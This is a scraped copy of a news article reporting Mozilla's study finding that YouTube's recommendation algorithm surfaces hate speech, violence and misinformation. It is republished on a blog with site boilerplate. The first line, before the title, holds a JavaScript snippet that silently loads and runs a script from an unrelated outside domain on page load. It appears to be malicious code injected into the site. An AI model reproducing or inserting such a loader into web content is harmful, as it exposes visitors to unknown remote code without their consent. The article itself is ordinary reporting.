;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); YouTube algorithm surfaces potentially harmful videos, study finds | AppleInsider - TechFire
More
    HomeAppleYouTube algorithm surfaces potentially harmful videos, study finds | AppleInsider

    YouTube algorithm surfaces potentially harmful videos, study finds | AppleInsider

    [ad_1]

    YouTube’s algorithm recommends objectionable, controversial, or otherwise problematic videos to its users, according to the results of a new crowdsourced study.

    The results of the study, which were published by Firefox maker Mozilla, found thousands of instances of YouTube recommending “regrettable” videos. That broad category includes videos that contain hate speech, violence, and misinformation.

    According to the research, 71% of videos that were flagged as problematic came from YouTube’s own recommendations. The videos that surfaced tended to be much more popular, suggesting that content that contains controversial elements are favored by the system.

    About 9% of the “regrettable” videos were later pulled by YouTube for violating the company’s policy platform. The investigation also found that users in non-English-speaking countries were recommended problematic content at a 60% higher rate.

    To fix the YouTube recommendation problem, Mozilla calls for “common sense transparency laws, better oversight, and consumer pressure.”

    “Research by Mozilla and countless other experts has confirmed that there are significant harms associated with YouTube,” the organization wrote. “YouTube has made it clear that they are taking the wrong approach to managing this responsibility. We will only get closer to the right approach with greater openness, transparency, accountability, and humility.”

    Mozilla conducted the study over a 10-month period through Firefox and Chrome extensions that allowed users to report “regrettable” content, or content that they regretted watching.

    In total, Mozilla gathered 3,362 reports submitted by 1,622 individual users across 91 countries. The study was carried out between July 2020 and June 2021. After getting the data, Mozilla hired 42 University of Exeter researchers to review the submissions and probe whether the videos violated YouTube’s policies.

    As far as a more specific definition of a “YouTube Regret,” Mozilla’s report details it as “hate speech, debunked political and scientific misinformation, and other categories of content that would likely … violate YouTube’s Community Guidelines.” It could also include “borderline content,” which could skirt the borders of YouTube’s policies without violating them. This content might lead viewers down “dangerous paths.” Mozilla first identified “YouTube Regret” in a crowdsourced study in 2019 in which respondents self-identified content as “regrettable.”

    The full results of the study, including researcher analysis, are available here.

    Keep up with everything Apple in the weekly AppleInsider Podcast — and get a fast news update from AppleInsider Daily. Just say, “Hey, Siri,” to your HomePod mini and ask for these podcasts, and our latest HomeKit Insider episode too.

    If you want an ad-free main AppleInsider Podcast experience, you can support the AppleInsider podcast by subscribing for $5 per month through Apple’s Podcasts app, or via Patreon if you prefer any other podcast player.

    [ad_2]

    Source link

    Md Kashif Ali
    Md Kashif Ali
    Hey Guys Its Kashif, Founder of Tech Fire. I spend most of my free time creating content for my YouTube channel and this website. I started my YouTube channel at age 15 and my goal was to teach people what they can do with their gadgets.
    RELATED ARTICLES

    LEAVE A REPLY

    Please enter your comment!
    Please enter your name here

    This site uses Akismet to reduce spam. Learn how your comment data is processed.

    - Advertisment -

    Most Popular